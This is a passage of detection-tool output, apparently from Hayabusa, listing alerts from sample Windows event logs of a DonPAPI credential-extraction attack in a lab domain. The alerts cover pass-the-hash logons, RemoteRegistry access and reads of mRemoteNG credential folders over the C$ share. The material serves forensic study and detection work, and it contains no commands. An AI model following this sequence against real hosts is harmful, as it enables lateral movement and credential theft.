07:16:04.523 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.539 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.586 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.601 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified 
(DonPapi).evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.648 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.664 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.728 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.743 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 
%%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.790 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724dd2,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
07:16:04.790 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.821 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724e0b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.868 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.884 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified 
(DonPapi).evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.931 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.946 +00:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.982 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:04.998 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.013 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.029 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 
+00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.045 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.060 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: 